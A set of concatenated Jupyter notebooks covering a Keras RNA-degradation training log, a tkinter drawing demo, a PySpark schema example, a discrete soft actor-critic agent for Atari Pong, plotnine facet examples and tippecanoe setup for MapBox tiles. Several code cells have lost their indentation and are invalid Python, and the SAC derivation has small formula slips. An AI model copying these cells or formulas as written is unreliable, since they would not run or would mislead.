Epoch 00042: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05.
120/120 - 7s - loss: 4.4446 - output_react_loss: 0.4837 - output_bg_ph_loss: 0.5138 - output_ph_loss: 0.7438 - output_mg_c_loss: 0.5199 - output_c_loss: 0.6659 - val_loss: 4.4508 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6217 - val_output_ph_loss: 0.5920 - val_output_mg_c_loss: 0.5283 - val_output_c_loss: 0.5190
Epoch 43/70
120/120 - 7s - loss: 4.3063 - output_react_loss: 0.4751 - output_bg_ph_loss: 0.4987 - output_ph_loss: 0.7046 - output_mg_c_loss: 0.4995 - output_c_loss: 0.6551 - val_loss: 4.4425 - val_output_react_loss: 0.5194 - val_output_bg_ph_loss: 0.6206 - val_output_ph_loss: 0.5911 - val_output_mg_c_loss: 0.5265 - val_output_c_loss: 0.5182
Epoch 44/70
120/120 - 7s - loss: 4.4064 - output_react_loss: 0.4764 - output_bg_ph_loss: 0.5094 - output_ph_loss: 0.7278 - output_mg_c_loss: 0.5196 - output_c_loss: 0.6679 - val_loss: 4.4411 - val_output_react_loss: 0.5194 - val_output_bg_ph_loss: 0.6206 - val_output_ph_loss: 0.5908 - val_output_mg_c_loss: 0.5261 - val_output_c_loss: 0.5180
Epoch 45/70
120/120 - 7s - loss: 4.4373 - output_react_loss: 0.4823 - output_bg_ph_loss: 0.5169 - output_ph_loss: 0.7386 - output_mg_c_loss: 0.5150 - output_c_loss: 0.6702 - val_loss: 4.4420 - val_output_react_loss: 0.5194 - val_output_bg_ph_loss: 0.6208 - val_output_ph_loss: 0.5907 - val_output_mg_c_loss: 0.5264 - val_output_c_loss: 0.5180
Epoch 46/70
120/120 - 7s - loss: 4.4963 - output_react_loss: 0.4870 - output_bg_ph_loss: 0.5140 - output_ph_loss: 0.7410 - output_mg_c_loss: 0.5299 - output_c_loss: 0.6936 - val_loss: 4.4415 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6206 - val_output_ph_loss: 0.5905 - val_output_mg_c_loss: 0.5261 - val_output_c_loss: 0.5178
Epoch 47/70
Restoring model weights from the end of the best epoch.
Epoch 00047: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06.
120/120 - 8s - loss: 4.4492 - output_react_loss: 0.4823 - output_bg_ph_loss: 0.5137 - output_ph_loss: 0.7492 - output_mg_c_loss: 0.5126 - output_c_loss: 0.6827 - val_loss: 4.4389 - val_output_react_loss: 0.5192 - val_output_bg_ph_loss: 0.6203 - val_output_ph_loss: 0.5904 - val_output_mg_c_loss: 0.5258 - val_output_c_loss: 0.5177
Epoch 00047: early stopping
###Markdown
Model loss graph
###Code
for fold, history in enumerate(history_list):
print(f'\nFOLD: {fold+1}')
min_valid_idx = np.array(history['val_loss']).argmin()
print(f"Train {np.array(history['loss'])[min_valid_idx]:.5f} Validation {np.array(history['val_loss'])[min_valid_idx]:.5f}")
plot_metrics_agg(history_list)
###Output
FOLD: 1
Train 4.08940 Validation 4.55253
FOLD: 2
Train 3.78819 Validation 4.34760
FOLD: 3
Train 4.06594 Validation 4.46747
FOLD: 4
Train 4.15711 Validation 4.50378
FOLD: 5
Train 4.50192 Validation 4.43876
###Markdown
Post-processing
###Code
# Assign preds to OOF set
for idx, col in enumerate(pred_cols):
val = oof_preds[:, :, idx]
oof = oof.assign(**{f'{col}_pred': list(val)})
oof.to_csv('oof.csv', index=False)
oof_preds_dict = {}
for idx, col in enumerate(pred_cols):
    oof_preds_dict[col] = oof_preds[:, :, idx]
# Assign values to test set
preds_ls = []
for df, preds in [(public_test, test_public_preds), (private_test, test_private_preds)]:
for i, uid in enumerate(df.id):
single_pred = preds[i]
single_df = pd.DataFrame(single_pred, columns=pred_cols)
single_df['id_seqpos'] = [f'{uid}_{x}' for x in range(single_df.shape[0])]
preds_ls.append(single_df)
preds_df = pd.concat(preds_ls)
###Output
_____no_output_____
###Markdown
Model evaluation
###Code
y_true_dict = get_targets_dict(train, pred_cols, train.index)
y_true = np.array([y_true_dict[col] for col in pred_cols]).transpose((1, 2, 0, 3)).reshape(oof_preds.shape)
display(evaluate_model(train, y_true, oof_preds, pred_cols))
display(evaluate_model(train, y_true, oof_preds, pred_cols, use_cols=['reactivity', 'deg_Mg_pH10', 'deg_Mg_50C']))
###Output
_____no_output_____
###Markdown
Visualize test predictions
###Code
submission = pd.read_csv(database_base_path + 'sample_submission.csv')
submission = submission[['id_seqpos']].merge(preds_df, on=['id_seqpos'])
###Output
_____no_output_____
###Markdown
Test set predictions
###Code
display(submission.head(10))
display(submission.describe())
submission.to_csv('submission.csv', index=False)
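# Illustrative sanity checks (a sketch, assuming `database_base_path` and `submission` from above):
# every id_seqpos required by the sample submission should be present exactly once after the merge.
sample = pd.read_csv(database_base_path + 'sample_submission.csv')
assert submission['id_seqpos'].is_unique
assert len(submission) == len(sample)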
###Output
_____no_output_____ |
Python3/Anaconda-Jupyter/Python181103-059.ipynb | ###Markdown
Problem: drawing, a comprehensive example. Program analysis: use a tkinter canvas, a for loop and a little trigonometry to draw concentric circles with radiating lines. Program source code:
###Code
#!/usr/bin/python
# -*- coding: UTF-8 -*-
if __name__ == '__main__':
from tkinter import *
canvas = Canvas(width = 300,height = 300,bg = 'green')
canvas.pack(expand = YES,fill = BOTH)
x0 = 150
y0 = 100
canvas.create_oval(x0 - 10,y0 - 10,x0 + 10,y0 + 10)
canvas.create_oval(x0 - 20,y0 - 20,x0 + 20,y0 + 20)
canvas.create_oval(x0 - 50,y0 - 50,x0 + 50,y0 + 50)
import math
B = 0.809
for i in range(16):
a = 2 * math.pi / 16 * i
x = math.ceil(x0 + 48 * math.cos(a))
y = math.ceil(y0 + 48 * math.sin(a) * B)
canvas.create_line(x0,y0,x,y,fill = 'red')
canvas.create_oval(x0 - 60,y0 - 60,x0 + 60,y0 + 60)
for k in range(501):
for i in range(17):
a = (2 * math.pi / 16) * i + (2 * math.pi / 180) * k
x = math.ceil(x0 + 48 * math.cos(a))
            y = math.ceil(y0 + 48 * math.sin(a) * B)
canvas.create_line(x0,y0,x,y,fill = 'red')
for j in range(51):
a = (2 * math.pi / 16) * i + (2* math.pi / 180) * k - 1
x = math.ceil(x0 + 48 * math.cos(a))
y = math.ceil(y0 + 48 * math.sin(a) * B)
canvas.create_line(x0,y0,x,y,fill = 'red')
mainloop()
###Output
_____no_output_____ |
Spark_DataSets/PySpark_DataSets/01_spark_basics_schema.ipynb | ###Markdown
Creating the Schema
###Code
schema = StructType([StructField("name", StringType(), True), StructField("grade", IntegerType(), True)])
df = spark.read.json("datasets/student.json", schema=schema)
df.printSchema()
df.describe().show()
###Output
+-------+-----+-----------------+
|summary| name| grade|
+-------+-----+-----------------+
| count| 3| 3|
| mean| null|6.666666666666667|
| stddev| null|2.516611478423583|
| min| Jonh| 4|
| max|Peter| 9|
+-------+-----+-----------------+
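###Markdown
With the schema in place, ordinary DataFrame operations work as expected; for example (an illustrative sketch, reusing the `df` loaded above), selecting the students with a grade of at least 6:
###Code
df.filter(df.grade >= 6).show()
###Output
_____no_output_____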
|
algorithm_implement/soft_actor_critic/soft_actor_critic(SAC)_discrete_image.ipynb | ###Markdown
Algorithm: Soft Actor-Critic (from the paper)*** **Input:** $\theta_1, \theta_2, \phi .$ $\bar{\theta}_1\leftarrow \theta_1 ,\bar{\theta}_2\leftarrow \theta_2$ $D \leftarrow \varnothing$ **for** each iteration **do** **for** each environment step **do** $a_t \sim \pi_\phi(a_t|s_t)$ $s_{t+1}\sim p(s_{t+1}|s_t, a_t)$ $D \leftarrow D\cup\{(s_t,a_t,r(s_t,a_t),s_{t+1})\}$ **end for** **for** each gradient step **do** $\theta_i\leftarrow\theta_i - \lambda_Q\hat{\nabla}_{\theta_i}J_Q(\theta_i) $ for $i\in \{1,2\}$ Update the Q-function parameters $\phi \leftarrow \phi - \lambda_\pi\hat{\nabla}_\phi J_\pi(\phi)$ Update policy weights $\psi\leftarrow \lambda_V\hat{\nabla}_\psi J_V(\psi)$ Adjust temperature $\bar{\theta}_i\leftarrow \tau\theta_i+(1-\tau)\bar{\theta}_i $ for $i\in \{1,2\}$ Update target network weights **end for** **end for** **Output:** $\theta_1,\theta_2,\phi$ Main formulas: 1. Soft Bellman residual:$$J_Q(\theta)=\mathbb{E}_{(s_t,a_t)\sim D}\big[\frac{1}{2}(Q_\theta(s_t,a_t)-{\cal{T}}^\pi Q(s_t,a_t))^2\big]\tag{1}$$Soft Q-value function:$${\cal{T}}^\pi Q(s_t,a_t) \triangleq r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim p}[V_\bar{\theta}(s_{t+1})]\tag{2}$$Soft state value function:$$V(s_t) = \mathbb{E}_{a_t\sim \pi}[Q(s_t,a_t)-\alpha\log\pi(a_t|s_t)]\tag{3}$$From these, the gradient of the soft Bellman residual follows:$$\hat{\nabla}_\theta J_Q(\theta)=\nabla_\theta Q_\theta(a_t,s_t)(Q_\theta(s_t,a_t)-(r(s_t,a_t)+\gamma(Q_{\bar{\theta}}(s_{t+1},a_{t+1})-\alpha\log(\pi_\phi(a_{t+1}|s_{t+1}))))\tag{4}$$2. Policy loss:$$J_\pi(\phi)=-\mathbb{E}_{s_t\sim D}\big[\mathbb{E}_{a_t\sim \pi_\phi}[Q_\phi(s_t,a_t)-\alpha\log(\pi_\phi(a_t|s_t))]\big]\tag{5}$$Using the reparameterization$$a_t=f_\phi(\epsilon_t;s_t),\tag{6}$$this can be rewritten as$$J_\pi(\phi)=-\mathbb{E}_{s_t\sim D,\;\epsilon_t\sim N}[Q_\theta(s_t,f_\phi(\epsilon_t;s_t))-\alpha\log\pi_\phi(f_\phi(\epsilon_t;s_t)|s_t)]\tag{7}$$so its gradient takes the form$$\hat{\nabla}_\phi J_\pi(\phi)=\nabla_\phi\alpha\log(\pi_\phi(a_t|s_t))+\big(\nabla_{a_t}\alpha\log(\pi_\phi(a_t|s_t))-\nabla_{a_t}Q(s_t,a_t)\big)\nabla_\phi f_\phi(\epsilon_t;s_t),\tag{8}$$3. Adaptive temperature $\alpha$ (the paper frames $\alpha$, $Q$ and $\pi$ as a dual problem, which is still a bit unclear to me):$$\alpha^*_t=\arg {\min_{\alpha_t}}\mathbb{E}_{a_t\sim\pi^*_t}[-\alpha_t\log\pi^*_t(a_t|s_t;a_t)-\alpha_t\bar{H}]\tag{9}$$ Formula proofs: 1. Proof of formula $f_2(f_3)$: starting from the very first transition, the $soft\ reward$ obtained for the $action$ taken in each $state$ can be defined as:$$r_{soft}(s_t,a_t)=r(s_t,a_t)+\gamma\alpha\mathbb{E}_{s_{t+1}\sim \rho}H(\pi(\cdot|s_{t+1}))\tag{10}$$Substituting this into the original $Q\ function\ : Q(s_t,a_t)=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1},a_{t+1}}[Q(s_{t+1},a_{t+1})]$ gives:$$\begin{aligned}Q_{soft}(s_t,a_t)&=r(s_t,a_t)+\gamma\alpha\mathbb{E}_{s_{t+1}\sim\rho}H(\pi(\cdot|s_{t+1}))+\gamma\mathbb{E}_{s_{t+1},a_{t+1}}[Q_{soft}(s_{t+1},a_{t+1})]\\&=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim\rho,a_{t+1}\sim\pi}[Q_{soft}(s_{t+1},a_{t+1})]+\gamma\alpha\mathbb{E}_{s_{t+1}\sim\rho}H(\pi(\cdot|s_{t+1}))\\&=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim\rho,a_{t+1}\sim\pi}[Q_{soft}(s_{t+1},a_{t+1})]+\gamma\mathbb{E}_{s_{t+1}\sim\rho}\mathbb{E}_{a_{t+1}\sim\pi}[-\alpha\log\pi(a_{t+1}|s_{t+1})]\\&=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim\rho}[\mathbb{E}_{a_{t+1}\sim\pi}[Q_{soft}(s_{t+1},a_{t+1})-\alpha\log(\pi(a_{t+1}|s_{t+1}))]]\end{aligned}\tag{11}$$2. 
Proof of formula $f$ [Relative entropy (KL divergence)](https://blog.csdn.net/tsyccnh/article/details/79163834): for two probability distributions P(x) and Q(x) of the same random variable x, it measures how different the two distributions are:$$D_{KL}(p||q)=\sum_{i=1}^n p(x_i)\log[\frac{p(x_i)}{q(x_i)}]$$The closer $D_{KL}$ is to 0, the closer the distributions $p$ and $q$ are. Expanding gives$$\begin{aligned}D_{KL}(p||q)&=\sum_{i=1}^np(x_i)\log(p(x_i))-\sum^n_{i=1}p(x_i)\log(q(x_i)) \\&=\underbrace{-H(p(x))}_{\text{entropy}}+\underbrace{[-\sum^n_{i=1}p(x_i)\log(q(x_i))]}_{\text{cross entropy}}\end{aligned}$$In a classification problem the label distribution p is fixed, so the first term is constant and only the second term, the **cross entropy**, needs to be computed. Landscape: after all that theory, the idea is simply that both the actor and the critic include an entropy term in their losses to encourage exploration. In other words, since the critic guides the actor, the critic must also keep "encourage exploration" in mind, otherwise it cannot anticipate the actor's behaviour. Note that the deterministic version of SAC has no entropy term, because a deterministic policy provides no source of entropy (so deterministic SAC may actually perform worse than TD3). Entropy requires a stochastic distribution (e.g. a normal distribution), so switching to a discrete action space only takes a few lines of code. Implementation tips: 1. Use torch.no_grad() rather than .detach(); it is more explicit. The five EDITs relative to continuous SAC: 1. The Critic network takes the state as input and outputs one Q-value per action. 2. The Actor network outputs a softmax distribution. 3. The Critic update gathers the Q-values of the actions sampled from the Actor. 4. The alpha update gathers the log-probabilities of the sampled actions from the Actor. 5. The Actor update is weighted by the probability of each action, which minimises the variance. ---Atari environments are very sensitive to the learning rate; 1e-3 and 1e-4 behave very differently.---Adding nn.BatchNorm2d(32) does not speed up learning.
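A quick numeric illustration of formula (3) for a discrete policy (a sketch; the tensors below are toy placeholders for the action probabilities and Q-values produced by the networks defined next). Because the action space is finite, the expectation over actions can be computed exactly by weighting with the action probabilities, which is the same weighting used in EDIT 5.
###Code
import torch
# Toy example: a batch of 2 states with 3 discrete actions (made-up numbers, for illustration only)
action_probs = torch.tensor([[0.2, 0.5, 0.3], [0.6, 0.1, 0.3]])
action_log_probs = action_probs.log()
q_values = torch.randn(2, 3)
alpha = 0.2
# V(s) = sum_a pi(a|s) * (Q(s,a) - alpha * log pi(a|s))
soft_v = (action_probs * (q_values - alpha * action_log_probs)).sum(dim=1, keepdim=True)
soft_v
###Output
_____no_output_____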
###Code
import torch
import torch.nn as nn
import torch.optim as optim
from torch.distributions import Categorical
import torch.nn.functional as F
from torch.utils.tensorboard import SummaryWriter
import gym
import random
import numpy as np
from itertools import count
import matplotlib.pyplot as plt
from collections import namedtuple, deque
import time
import os
import sys
sys.path.append('../')
from utils.wrappers import make_atari, wrap_deepmind, wrap_pytorch
%matplotlib inline
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
class ReplayBuffer:
def __init__(self, state_dims, buffer_size, batch_size):
self.state = np.zeros((buffer_size, state_dims[0], state_dims[1], state_dims[2]), dtype=np.float32)
self.action = np.zeros(buffer_size, dtype=np.float32)
self.next_state = np.zeros((buffer_size, state_dims[0], state_dims[1], state_dims[2]), dtype=np.float32)
self.reward = np.zeros(buffer_size, dtype=np.float32)
self.done = np.zeros(buffer_size, dtype=np.float32)
self.batch_size = batch_size
self.buffer_size = buffer_size
self.size, self.current_index = 0, 0
def store(self, state, action, next_state, reward, done):
self.state[self.current_index] = state
self.action[self.current_index] = action
self.next_state[self.current_index] = next_state
self.reward[self.current_index] = reward
self.done[self.current_index] = done
self.current_index = (self.current_index + 1) % self.buffer_size
self.size = min((self.size + 1), self.buffer_size)
def sample(self):
idx = np.random.choice(self.size, self.batch_size)
return dict(state = torch.FloatTensor(self.state[idx]).to(device),
action = torch.LongTensor(self.action[idx]).unsqueeze(1).to(device),
next_state = torch.FloatTensor(self.next_state[idx]).to(device),
reward = torch.FloatTensor(self.reward[idx]).unsqueeze(1).to(device),
done = torch.FloatTensor(self.done[idx]).unsqueeze(1).to(device))
def __len__(self):
return self.size
def weights_init_(m):
if isinstance(m, nn.Linear):
        # Xavier (Glorot) uniform initialisation: std = gain * sqrt(2 / (fan_in + fan_out)),
        # used in place of the std of a Gaussian N(0, std^2)
torch.nn.init.xavier_uniform_(m.weight, gain=1)
if m.bias is not None:
torch.nn.init.constant_(m.bias, 0)
# self.common_layer = nn.Sequential(
# nn.Conv2d(state_dims[0], 32, kernel_size=5, stride=1, padding=2),
# nn.MaxPool2d(2),
# nn.ReLU(),
# nn.Conv2d(32, 32, kernel_size=5, stride=1, padding=1),
# nn.MaxPool2d(2),
# nn.ReLU(),
# nn.Conv2d(32, 64, kernel_size=4, stride=1, padding=1),
# nn.MaxPool2d(2),
# nn.ReLU(),
# nn.Conv2d(64, 64, kernel_size=3, stride=1),
# nn.MaxPool2d(2),
# nn.ReLU()
# )
# EDIT 1
class Critic(nn.Module):
def __init__(self, state_dims, action_dim, hidden_dim=512):
super(Critic, self).__init__()
self.common_layer = nn.Sequential(
nn.Conv2d(state_dims[0], 32, kernel_size=8, stride=4),
nn.BatchNorm2d(32),
nn.ReLU(),
nn.Conv2d(32, 64, kernel_size=4, stride=2),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 64, kernel_size=3, stride=1),
nn.BatchNorm2d(64),
nn.ReLU()
)
self.linear1 = nn.Linear(7 * 7 * 64, hidden_dim)
self.linear2 = nn.Linear(hidden_dim, action_dim)
self.apply(weights_init_)
def forward(self, state):
common = self.common_layer(state)
common = common.view(common.size(0), -1)
linear = F.relu(self.linear1(common))
value = self.linear2(linear)
return value
# EDIT 2
class Actor(nn.Module):
def __init__(self, state_dims, action_dim, hidden_dim=512):
super(Actor, self).__init__()
self.common_layer = nn.Sequential(
nn.Conv2d(state_dims[0], 32, kernel_size=8, stride=4),\
nn.BatchNorm2d(32),
nn.ReLU(),
nn.Conv2d(32, 64, kernel_size=4, stride=2),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 64, kernel_size=3, stride=1),
nn.BatchNorm2d(64),
nn.ReLU()
)
self.linear1 = nn.Linear(7 * 7 * 64, hidden_dim)
self.linear2 = nn.Linear(hidden_dim, action_dim)
self.apply(weights_init_)
def forward(self, state):
common = self.common_layer(state)
common = common.view(common.size(0), -1)
linear = F.relu(self.linear1(common))
action_probs = F.softmax(self.linear2(linear), dim=1)
max_action_prob = torch.argmax(action_probs, dim=1)
dist = Categorical(action_probs)
action = dist.sample()
action_log_prob = dist.logits
return action.unsqueeze(1), action_probs, action_log_prob
def take_action(state, timesteps):
if start_steps > timesteps:
action = env.action_space.sample()
else:
state = torch.FloatTensor(state).unsqueeze(0).to(device)
with torch.no_grad():
action, _, _ = actor(state)
action = action.item()
return action
## hyperparameters
env_name = "PongNoFrameskip-v4"
start_steps = 10000
# env_name = "Breakout-v0"
# start_steps = 500
env = make_atari(env_name)
env = wrap_deepmind(env)
env = wrap_pytorch(env)
algorithm_id = "soft_actor_critic_discrete_image"
buffer_size = int(1e6)
batch_size = 64
episodes = 10000
learning_rate = 1e-5
gamma = 0.99
soft_tau = 5e-3
actor_update = 2
automatic_entropy_tuning = True
## hyperparameters
current_time = time.strftime('%Y-%m-%d_%H:%M:%S',time.localtime(time.time()))
ROOT_DIR = "../running_log/{}/{}/{}".format(algorithm_id, env_name, current_time)
model_dir = os.path.join(ROOT_DIR, "model")
plot_dir = os.path.join(ROOT_DIR, "tensorboard")
os.makedirs(model_dir)
os.makedirs(plot_dir)
writer = SummaryWriter(plot_dir, comment="learning_rate={}-batch_size={}-start_steps={}"
.format(learning_rate , batch_size, start_steps))
# env = gym.make(env_name)
# state_dim = env.observation_space.shape[0]
state_dims = env.observation_space.shape
action_dim = env.action_space.n
critic_1 = Critic(state_dims, action_dim).to(device)
critic_2 = Critic(state_dims, action_dim).to(device)
target_critic_1 = Critic(state_dims, action_dim).to(device)
target_critic_2 = Critic(state_dims, action_dim).to(device)
actor = Actor(state_dims, action_dim).to(device)
target_critic_1.load_state_dict(critic_1.state_dict())
target_critic_2.load_state_dict(critic_2.state_dict())
critic_optimizer_1 = optim.Adam(critic_1.parameters(), lr=learning_rate)
critic_optimizer_2 = optim.Adam(critic_2.parameters(), lr=learning_rate)
actor_optimizer = optim.Adam(actor.parameters(), lr=learning_rate)
buffer = ReplayBuffer(state_dims, buffer_size, batch_size)
# torch.prod()
# Returns the product of all elements in the :attr:`input` tensor
# i.e. returns the product of all elements of the input tensor (optionally along a given dimension)
if automatic_entropy_tuning:
# target_entropy = - torch.prod(torch.Tensor(env.action_space.shape).to(device)).item() # -4.0
target_entropy = - 1.0
log_alpha = torch.zeros(1, requires_grad=True, device=device) # tensor([0.], device='cuda:0', requires_grad=True)
alpha = log_alpha.exp()
alpha_optim = optim.Adam([log_alpha], lr=learning_rate)
def sac_train(updates, steps_):
global alpha
for i in range(steps_):
samples = buffer.sample()
state, action, next_state = samples["state"], samples["action"], samples["next_state"]
reward, done = samples["reward"], samples["done"]
# update critic
with torch.no_grad():
# EDIT 3
next_action, _, next_action_log_probs = actor(next_state)
next_action_log_probs = next_action_log_probs.gather(1, next_action.long())
target_Q_1 = target_critic_1(next_state).gather(1, next_action.long())
target_Q_2 = target_critic_2(next_state).gather(1, next_action.long())
Q_target_next = torch.min(target_Q_1, target_Q_2) - alpha * next_action_log_probs
next_q_value = reward + (1.0 - done) * gamma * Q_target_next
Q_1 = critic_1(state).gather(1, action)
Q_2 = critic_2(state).gather(1, action)
critic_loss_1 = F.mse_loss(next_q_value, Q_1)
critic_loss_2 = F.mse_loss(next_q_value, Q_2)
critic_optimizer_1.zero_grad()
critic_loss_1.backward()
critic_optimizer_1.step()
critic_optimizer_2.zero_grad()
critic_loss_2.backward()
critic_optimizer_2.step()
# update actor
# EDIT 5
if i % actor_update == 0:
actions, action_probs, action_log_probs = actor(state)
min_Q_value = torch.min(critic_1(state), critic_2(state))
actor_loss = (alpha * action_log_probs - min_Q_value) * action_probs
actor_loss = torch.sum(actor_loss, dim=1, keepdim=True).mean()
actor_optimizer.zero_grad()
actor_loss.backward()
actor_optimizer.step()
# update entropy_tuning
if automatic_entropy_tuning:
# EDIT 4
action_log_probs = action_log_probs.gather(1, actions.long())
alpha_loss = - log_alpha * (action_log_probs.detach() + target_entropy)
alpha_loss = alpha_loss.mean()
alpha_optim.zero_grad()
alpha_loss.backward()
alpha_optim.step()
alpha = log_alpha.exp()
# update parameter
for target_param, param in zip(target_critic_1.parameters(), critic_1.parameters()):
target_param.data.copy_(target_param.data*(1.0-soft_tau) + param.data * soft_tau)
for target_param, param in zip(target_critic_2.parameters(), critic_2.parameters()):
target_param.data.copy_(target_param.data*(1.0-soft_tau) + param.data * soft_tau)
writer.add_scalars("Loss/Critic", {"critic_1":critic_loss_1,
"critic_2":critic_loss_2}, updates)
writer.add_scalar("Loss/Actor", actor_loss, updates)
writer.add_scalar("Loss/Alpha", alpha_loss, updates)
updates, timesteps, done_time = 0, 0, 0
for episode in range(episodes):
state = env.reset()
episode_reward = 0
for i in count():
timesteps += 1
action = take_action(state, timesteps)
next_state, reward, done, _ = env.step(action)
buffer.store(state, action, next_state, reward, done)
state = next_state
episode_reward += reward
if done:
if len(buffer) > batch_size:
sac_train(updates, i+1)
updates += 1
writer.add_scalar("Episode_step", i, done_time)
done_time += 1
break
writer.add_scalar("Reward", episode_reward, episode)
torch.save(actor, model_dir + "/actor_model.pth")
###Output
_____no_output_____ |
demo_plot/plotnine-examples/examples/facet_wrap.ipynb | ###Markdown
Facet wrap`facet_wrap()` creates a collection of plots (facets), where each plot is differentiated by the faceting variable. These plots are wrapped into a certain number of columns or rows as specified by the user.
###Code
mpg.head()
###Output
_____no_output_____
###Markdown
Basic scatter plot:
###Code
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
Facet a discrete variable using `facet_wrap()`:
###Code
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class')
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
Control the number of rows and columns with the options `nrow` and `ncol`:
###Code
# Selecting the number of columns to display
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class',
ncol = 4 # change the number of columns
)
+ labs(x='displacement', y='horsepower')
)
# Selecting the number of rows to display
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class',
               nrow = 4 # change the number of rows
)
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
To change the plot order of the facets, reorder the levels of the faceting variable in the data.
###Code
# re-order categories
mpg['class'] = mpg['class'].cat.reorder_categories(['pickup', 'suv','minivan','midsize','compact','subcompact','2seater'])
# facet plot with reorded drv category
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class')
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
Ordinarily the facets are arranged horizontally (left-to-right from top to bottom). However if you would prefer a vertical layout (facets are arranged top-to-bottom, from left to right) use the `dir` option:
###Code
# Facet plot with vertical layout
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class'
, dir = 'v' # change to a vertical layout
)
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
You can choose whether the scales of the x- and y-axes are fixed or variable. Set the `scales` argument to `free_y`, `free_x` or `free` for free scales on the y-axis, x-axis or both axes respectively. You may need to add spacing between the facets to ensure axis ticks and values are easy to read. A fixed scale is the default and does not need to be specified.
###Code
# facet plot with free scales
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class'
, scales = 'free_y' # set scales so y-scale varies with the data
)
    + theme(subplots_adjust={'wspace': 0.25}) # add spacing between facets to make y-axis ticks visible
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
You can add additional information to your facet labels, by using the `labeller` argument within the `facet_wrap()` command. Below we use `labeller = 'label_both'` to include the column name in the facet label.
###Code
# facet plot with labeller
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class', labeller = 'label_both')
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
You can add two discrete variables to a facet:
###Code
# add additional column for plotting exercise
mpg["transmission"] = mpg['trans'].map(lambda x: "auto" if "auto" in x else "man" if "man" in x else "")
# inspect new column transmission which identifies cars as having an automatic or manual transmission
mpg.head()
# facet plot with two variables on one facet
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('~ class + transmission') # use ~ + to add additional faceting variables
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____ |
prepare_boundaries_for_mapbox.ipynb | ###Markdown
Prepare data for the Soils Revealed projecthttps://github.com/Vizzuality/soils-revealed-data`Edward P. Morris (vizzuality.)` DescriptionThis notebook transforms vector boundaries into MapBox tiles format (MBTILES) using tippecanoe and uploads the resulting tiles to MapBox.```MIT LicenseCopyright (c) 2020 VizzualityPermission is hereby granted, free of charge, to any person obtaining a copyof this software and associated documentation files (the "Software"), to dealin the Software without restriction, including without limitation the rightsto use, copy, modify, merge, publish, distribute, sublicense, and/or sellcopies of the Software, and to permit persons to whom the Software isfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in allcopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS ORIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THEAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHERLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THESOFTWARE.``` Setup Linux dependencies
###Code
%%bash
# Install AWS CLI (for MapBox uploads)
apt install --no-install-recommends -y -q awscli
%%bash
# Install tippecanoe (for MapBox mbtiles)
apt install --no-install-recommends -q -y build-essential libsqlite3-dev zlib1g-dev
make
make install
add-apt-repository -y ppa:ubuntu-toolchain-r/test
apt update -q -y
apt install --no-install-recommends -q -y g++-5
export CXX=g++-5
git clone https://github.com/mapbox/tippecanoe.git
cd tippecanoe
make -j
make install
!tippecanoe -h
###Output
tippecanoe: invalid option -- 'h'
Usage: tippecanoe [options] [file.json ...]
Output tileset
--output=output.mbtiles [--output-to-directory=...] [--force]
[--allow-existing]
Tileset description and attribution
[--name=...] [--attribution=...] [--description=...]
Input files and layer names
[--layer=...] [--named-layer=...]
Parallel processing of input
[--read-parallel]
Projection of input
[--projection=...]
Zoom levels
[--maximum-zoom=...] [--minimum-zoom=...]
[--extend-zooms-if-still-dropping] [--one-tile=...]
Tile resolution
[--full-detail=...] [--low-detail=...] [--minimum-detail=...]
Filtering feature attributes
[--exclude=...] [--include=...] [--exclude-all]
Modifying feature attributes
[--attribute-type=...] [--attribute-description=...]
[--accumulate-attribute=...] [--empty-csv-columns-are-null]
[--convert-stringified-ids-to-numbers]
[--use-attribute-for-id=...]
Filtering features by attributes
[--feature-filter-file=...] [--feature-filter=...]
Dropping a fixed fraction of features by zoom level
[--drop-rate=...] [--base-zoom=...] [--drop-lines]
[--drop-polygons] [--cluster-distance=...]
Dropping or merging a fraction of features to keep under tile size limits
[--drop-densest-as-needed] [--drop-fraction-as-needed]
[--drop-smallest-as-needed] [--coalesce-densest-as-needed]
[--coalesce-fraction-as-needed]
[--coalesce-smallest-as-needed] [--force-feature-limit]
[--cluster-densest-as-needed]
